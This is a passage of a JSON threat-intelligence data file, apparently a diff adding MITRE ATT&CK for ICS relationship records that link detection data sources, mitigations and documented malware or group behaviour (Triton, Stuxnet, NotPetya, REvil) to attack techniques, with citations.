"relationship--6b987f2a-3d07-4791-9c1c-e4f6818521e8", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:44:06.211Z", + "description": "Monitor for changes made to Windows Registry keys or values that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. 
For added context on adversary procedures and background see [Indicator Removal](https://attack.mitre.org/techniques/T1070) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--eb06ac7d-117a-48ab-ae3b-8bfa8f332f60", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:42:04.422Z", + "description": "Monitor for newly constructed files written to disk through a user visiting a website over the normal course of browsing.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f15f24d2-e581-46ce-83e4-a924f572aae6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.065Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. 
(Citation: Department of Homeland Security September 2016)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--686cbd74-ef49-4e77-9599-21777d3a4738", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.174Z", + "relationship_type": "mitigates", + "description": "Perform inline allowlisting of automation protocol commands to prevent devices from sending unauthorized command or reporting messages. 
Allow/denylist techniques need to be designed with sufficient accuracy to prevent the unintended blocking of valid messages.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d1971b32-3a15-4544-9f36-80c05121deb6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.160Z", + "relationship_type": "mitigates", + "description": "All devices or systems changes, including all administrative functions, should require authentication. Consider using access management technologies to enforce authorization on all management interface access attempts, especially when the device does not inherently provide strong authentication and authorization functions.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--79d05cb2-ded0-4847-b52e-af7af421f303", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kevin Savage and Branko Spasojevic", + "description": "Kevin Savage and Branko Spasojevic W32.Flamer Retrieved. 
2019/11/03 ", + "url": "https://web.archive.org/web/20190930124504/https://www.symantec.com/security-center/writeup/2012-052811-0308-99" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:50:07.974Z", + "description": "[Flame](https://attack.mitre.org/software/S0143) can collect AutoCAD design data and visio diagrams as well as other documents that may contain operational information. (Citation: Kevin Savage and Branko Spasojevic)", + "relationship_type": "uses", + "source_ref": "malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--63ca148e-12c9-4090-b51e-a8fb7a847a2a", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + }, + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 
2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:25:29.480Z", + "description": "[Triton](https://attack.mitre.org/software/S1009)'s argument-setting and inject.bin shellcode are added to the program table on the Tricon so that they are executed by the firmware once each cycle. (Citation: DHS CISA February 2019) (Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--73a48431-3597-4a72-acb8-c1e5019073e2", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Twitter ItsReallyNick Masquerading Update", + "description": "Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. 
Retrieved April 22, 2019.", + "url": "https://twitter.com/ItsReallyNick/status/1055321652777619457" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:41:24.266Z", + "description": "Monitor executed commands and arguments that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.(Citation: Twitter ItsReallyNick Masquerading Update)", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ab306654-2abb-4983-8d30-df4058adb06c", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Selena Larson, Camille Singleton December 2020", + "description": "Selena Larson, Camille Singleton 2020, December RANSOMWARE IN ICS ENVIRONMENTS Retrieved. 2021/04/12 ", + "url": "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf?utm_referrer=https%3A%2F%2Fwww.dragos.com%2Fresource%2Fransomware-in-ics-environments%2F" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:06:16.474Z", + "description": "The [REvil](https://attack.mitre.org/software/S0496) malware gained access to an organizations network and encrypted sensitive files used by OT equipment. 
(Citation: Selena Larson, Camille Singleton December 2020)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--111f437a-c67d-40e4-9515-7e9b22e65eff", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.234Z", + "relationship_type": "mitigates", + "description": "Audit domain and local accounts and their permission levels routinely to look for situations that could allow an adversary to gain system wide access with stolen privileged account credentials. (Citation: Microsoft May 2017) (Citation: Microsoft August 2018)These audits should also identify if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft February 2019)\n", + "source_ref": "course-of-action--622fe4d4-0e8e-4d17-9c25-6c9cef1f15d5", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "external_references": [ + { + "source_name": "Microsoft May 2017", + "description": "Microsoft 2017, May Attractive Accounts for Credential Theft Retrieved. 2020/09/25 ", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/attractive-accounts-for-credential-theft" + }, + { + "source_name": "Microsoft August 2018", + "description": "Microsoft 2018, August Implementing Least-Privilege Administrative Models Retrieved. 
2020/09/25 ", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/implementing-least-privilege-administrative-models" + }, + { + "source_name": "Microsoft February 2019", + "description": "Microsoft 2019, February Active Directory administrative tier model Retrieved. 2020/09/25 ", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3663f10d-4a2c-4d37-bf5f-337c9891c2f4", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:55:14.211Z", + "description": "Monitor for newly executed processes that depend on user interaction, especially for applications that can embed programmatic capabilities (e.g., Microsoft Office products with scripts, installers, zip files). This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads. 
For added context on adversary procedures and background see [User Execution](https://attack.mitre.org/techniques/T1204) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--739e7b8d-57d7-4c1d-8f42-1496606ea666", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos", + "description": "Dragos Symantec 2019, March 27 Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S. Retrieved. 2019/12/02 Magnallium Retrieved. 2019/10/27 ", + "url": "https://dragos.com/resource/magnallium/" + }, + { + "source_name": "Symantec March 2019", + "description": "Symantec 2019, March 27 Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S. Retrieved. 2019/12/02 ", + "url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:42:15.944Z", + "description": "[APT33](https://attack.mitre.org/groups/G0064) utilized PowerShell scripts to establish command and control and install files for execution. 
(Citation: Symantec March 2019) (Citation: Dragos)", + "relationship_type": "uses", + "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fb80368e-b3f6-4fa3-828b-b1cf792ea161", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:58:34.751Z", + "description": "Monitor executed commands and arguments for binaries that could be involved in data destruction activity, such as SDelete.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f584a257-c22a-434b-aa2d-6220987821ab", + "created": "2021-10-13T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 
2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:29:11.326Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) can communicate with the implant utilizing the TriStation 'get main processor diagnostic data' command and looks for a specifically crafted packet body from which it extracts a command value and its arguments. (Citation: Jos Wetzels January 2018)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ae7ed6d8-65cc-45a0-82c3-c28e5630bf7c", + "created": "2023-03-10T20:36:34.109Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 
2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:36:34.109Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary used a two-way radio to communicate with and set the frequencies of Maroochy Shire's repeater stations.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f8cf3800-6521-41d9-b272-d6ba2db0ccd2", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:09:42.474Z", + "description": "Monitor network traffic for ICS functions related to write commands for an excessive number of I/O points or manipulating a single value an excessive number of times.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4369da69-bb09-4cc8-8600-081a450f50e0", 
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.120Z", + "relationship_type": "mitigates", + "description": "Ensure that unnecessary ports and services are closed to prevent risk of discovery and potential exploitation.\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--06f15629-d050-434a-aed1-3bb3f90c97b2", + "created": "2022-09-27T15:22:37.864Z", + "revoked": false, + "external_references": [ + { + "source_name": "Elastic - Koadiac Detection with EQL", + "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", + "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:22:37.864Z", + "description": "Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL) For added context on adversary procedures and background see [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--82b20c35-88c6-49aa-8241-a59512b17b74", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + }, + { + "source_name": "Langer Stuxnet", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-17T16:00:35.053Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was able to self-replicate by being spread through removable drives. A willing insider or unknown third party, such as a contractor, may have brought the removable media into the target environment. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) The earliest version of Stuxnet relied on physical installation, infecting target systems when an infected configuration file carried by a USB stick was opened. 
(Citation: Langer Stuxnet)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6258c355-677c-452d-b1fc-27767232437b", + "created": "2019-03-26T16:19:52.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:58:23.141Z", + "description": "[NotPetya](https://attack.mitre.org/software/S0368) can move laterally through industrial networks by means of the SMB service. 
(Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b401f65c-5324-4fc0-8fce-0aa2ebf1f919", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:00:06.347Z", + "description": "Monitor ICS management protocols for parameter changes, including for unexpected values, changes far exceeding standard values, or for parameters being changed in an unexpected way (e.g., via a new function, at an unusual time).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--dded2d68-35c7-42c4-af10-efe7731673e3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.108Z", + "relationship_type": "mitigates", + "description": "All APIs on remote systems or local processes should require the authentication of users before executing any code or system changes.\n", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": 
"attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--bf75ca96-3f9d-413c-a244-888a3fbf0be3", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:37:24.268Z", + "description": "Monitor for unexpected files (e.g., .pdf, .docx, .jpg) viewed for collecting internal data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--af24e067-966d-41f8-b1ea-5a6e11ff1a2a", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:39:13.371Z", + "description": "Monitor for newly executed processes that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": 
"relationship--0dca1f7d-9965-467a-bea5-b8baa7c8b9fc", + "created": "2022-09-26T14:27:28.370Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:27:28.370Z", + "description": "Various techniques enable spoofing a reporting message. Consider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity which may precede this technique.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b116fcca-e872-4735-b7e2-4e4c8e34621a", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:56:58.977Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). 
